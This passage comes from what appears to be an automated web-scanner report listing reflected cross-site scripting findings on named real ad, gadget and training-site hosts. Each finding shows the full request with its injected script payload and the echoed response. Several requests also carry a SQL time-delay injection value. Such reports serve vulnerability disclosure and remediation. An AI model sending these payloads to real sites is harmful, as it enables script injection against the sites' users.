<a href="http://ad.doubleclick.net/click;h=v8/3aff/3/0/*/f;241006852;0-0;0;37579671;3454-728/90;42070397/42088184/1;;~sscs=?e11d8';alert(1)//93f53f18417http://altfarm.mediaplex.com/ad/ck/16228-124632-16454-0?mpt=570139" target="_blank">
...[SNIP]...
5.22. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c25c0"%3balert(1)//f9353723fef was submitted in the mpvc parameter. This input was echoed as c25c0";alert(1)//f9353723fef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D570139&mpt=570139&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aff/3/0/%2a/f%3B241006852%3B0-0%3B0%3B37579671%3B3454-728/90%3B42070397/42088184/1%3B%3B%7Esscs%3D%3fc25c0"%3balert(1)//f9353723fef HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:51:50 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 4282
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3aff/3/0/*/f;241006852;0-0;0;37579671;3454-728/90;42070397/42088184/1;;~sscs=?c25c0";alert(1)//f9353723fef");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3aff/3/0/*/f;241006852;0-0;0;37579671;3454-728/90;42070397/42088184/1;;~sscs=?c25c0";a
...[SNIP]...
5.23. http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 845e0%0aalert(1)//2a6a5889652 was submitted in the url parameter. This input was echoed as 845e0
alert(1)//2a6a5889652 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/recommended_pages.xml845e0%0aalert(1)//2a6a5889652&container=peoplesense&parent=http://allatsea.net/&mid=0&view=profile&d=0.558.7&lang=en&communityId=14672211859858017590&caller=http://allatsea.net/by-category/Sailing_Regatta HTTP/1.1
Host: iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 21:11:26 GMT
Expires: Fri, 06 May 2011 21:11:26 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 136

Unable to retrieve spec for http://www.google.com/friendconnect/gadgets/recommended_pages.xml845e0
alert(1)//2a6a5889652. HTTP error 400
5.24. http://jlinks.industrybrains.com/jsct [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 9b3c3<script>alert(1)</script>fd92264a39e was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=918&ct=SCMAGAZINE_ROS9b3c3<script>alert(1)</script>fd92264a39e&num=4&layt=624x300&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 21:50:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 06 May 2011 21:50:08 GMT
Content-Type: application/x-javascript
Content-Length: 85

// Error: Unknown old section SCMAGAZINE_ROS9b3c3<script>alert(1)</script>fd92264a39e
5.25. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e69b7<script>alert(1)</script>70b75349d17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=918&ct=SCMAGAZINE_ROS&num=4&layt=624x300&fmt=simp&e69b7<script>alert(1)</script>70b75349d17=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 21:50:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 06 May 2011 21:50:28 GMT
Content-Type: application/x-javascript
Content-Length: 69

// Error: Unknown parameter e69b7<script>alert(1)</script>70b75349d17
5.26. http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 9f349%0aalert(1)//0354955d84e was submitted in the url parameter. This input was echoed as 9f349
alert(1)//0354955d84e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/newsletterSubscribe.xml9f349%0aalert(1)//0354955d84e&container=peoplesense&parent=http://allatsea.net/&mid=0&view=profile&d=0.558.7&lang=en&up_newsletterHeadlineText=Subscribe+to+All+At+Sea!&up_newsletterStandardText=Get+updates+of+our+latest+content&communityId=14672211859858017590&caller=http://allatsea.net/subscribe.htm HTTP/1.1
Host: k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 21:13:20 GMT
Expires: Fri, 06 May 2011 21:13:20 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 138

Unable to retrieve spec for http://www.google.com/friendconnect/gadgets/newsletterSubscribe.xml9f349
alert(1)//0354955d84e. HTTP error 400
5.27. http://kroogy.com/pub/banner_160_600.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /pub/banner_160_600.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3e0ed<img%20src%3da%20onerror%3dalert(1)>c7f680ee50 was submitted in the REST URL parameter 1. This input was echoed as 3e0ed<img src=a onerror=alert(1)>c7f680ee50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pub3e0ed<img%20src%3da%20onerror%3dalert(1)>c7f680ee50/banner_160_600.php HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web/Linkbucks%20vlad%20modelS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:04:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2125

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Pub3e0ed<img src=a onerror=alert(1)>c7f680ee50Controller</strong>
...[SNIP]...
5.28. http://kroogy.com/pub/banner_728_90_random.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /pub/banner_728_90_random.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 15bf1<img%20src%3da%20onerror%3dalert(1)>c26cf5636dc was submitted in the REST URL parameter 1. This input was echoed as 15bf1<img src=a onerror=alert(1)>c26cf5636dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pub15bf1<img%20src%3da%20onerror%3dalert(1)>c26cf5636dc/banner_728_90_random.php HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: kroogy.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:03:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2126

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Pub15bf1<img src=a onerror=alert(1)>c26cf5636dcController</strong>
...[SNIP]...
5.29. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web/Linkbucks%20vlad%20modelS

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c3d36<img%20src%3da%20onerror%3dalert(1)>1f123855a7 was submitted in the REST URL parameter 1. This input was echoed as c3d36<img src=a onerror=alert(1)>1f123855a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searchc3d36<img%20src%3da%20onerror%3dalert(1)>1f123855a7/web/Linkbucks%20vlad%20modelS HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:07:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Searchc3d36<img src=a onerror=alert(1)>1f123855a7Controller</strong>
...[SNIP]...
5.30. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web/Linkbucks%20vlad%20modelS

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 19465<img%20src%3da%20onerror%3dalert(1)>7fccbdccd2f was submitted in the REST URL parameter 2. This input was echoed as 19465<img src=a onerror=alert(1)>7fccbdccd2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/web19465<img%20src%3da%20onerror%3dalert(1)>7fccbdccd2f/Linkbucks%20vlad%20modelS HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:07:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2117

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>web19465<img src=a onerror=alert(1)>7fccbdccd2f</strong>
...[SNIP]...
5.31. http://learn.bridgefront.com/sendpassword [button1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the button1 request parameter is copied into the HTML document as plain text between tags. The payload f7917<script>alert(1)</script>a6e02e7e600 was submitted in the button1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Passwordf7917<script>alert(1)</script>a6e02e7e600&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 22:09:30 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=AD543B39B2162043DABD3434006F7DBE; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
<b>
SERVER NAME: learn.bridgefront.com

SERVER PORT: 80

REMOTE HOST: 173.193.214.243

EXCEPTION: java.lang.NullPointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Passwordf7917<script>alert(1)</script>a6e02e7e600&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3


<table border="0">
...[SNIP]...
5.32. http://learn.bridgefront.com/sendpassword [button2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the button2 request parameter is copied into the HTML document as plain text between tags. The payload f1d32<script>alert(1)</script>81b609eefc9 was submitted in the button2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Namef1d32<script>alert(1)</script>81b609eefc9&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 22:20:26 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=1A39AB27A0B048AF89C51833109C8048; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
>
SERVER NAME: learn.bridgefront.com

SERVER PORT: 80

REMOTE HOST: 173.193.214.243

EXCEPTION: java.lang.NullPointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Namef1d32<script>alert(1)</script>81b609eefc9&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3


<table border="0">
...[SNIP]...
5.33. http://learn.bridgefront.com/sendpassword [forgetbrand parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the forgetbrand request parameter is copied into the HTML document as plain text between tags. The payload e9121<script>alert(1)</script>f3274d52418 was submitted in the forgetbrand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=nulle9121<script>alert(1)</script>f3274d52418&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 22:31:21 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=9695723B5707A0A14E3F1D2C5FCE2A02; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
earn.bridgefront.com

SERVER PORT: 80

REMOTE HOST: 173.193.214.243

EXCEPTION: java.lang.NullPointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Name&forgetbrand=nulle9121<script>alert(1)</script>f3274d52418&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3


<table border="0">
...[SNIP]...
5.34. http://learn.bridgefront.com/sendpassword [forwardpage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the forwardpage request parameter is copied into the HTML document as plain text between tags. The payload 43a96<script>alert(1)</script>7664851d448 was submitted in the forwardpage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp43a96<script>alert(1)</script>7664851d448&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 22:45:38 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=B2D8F44A4079D6989583448FA8EBFCD9; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
SERVER PORT: 80

REMOTE HOST: 173.193.214.243

EXCEPTION: java.lang.NullPointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp43a96<script>alert(1)</script>7664851d448&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3


<table border="0">
...[SNIP]...
5.35. http://learn.bridgefront.com/sendpassword [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5f2cc<script>alert(1)</script>b056eb85e91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3&5f2cc<script>alert(1)</script>b056eb85e91=1 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 23:38:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=4857F165EACF9C1A4E3140B4CD6C7B6B; Path=/
Content-Length: 6474
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
ointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3&5f2cc<script>alert(1)</script>b056eb85e91=1


<table border="0">
...[SNIP]...
5.36. http://learn.bridgefront.com/sendpassword [replace0_ul_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the replace0_ul_ request parameter is copied into the HTML document as plain text between tags. The payload 6728f<script>alert(1)</script>cb43f085596 was submitted in the replace0_ul_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

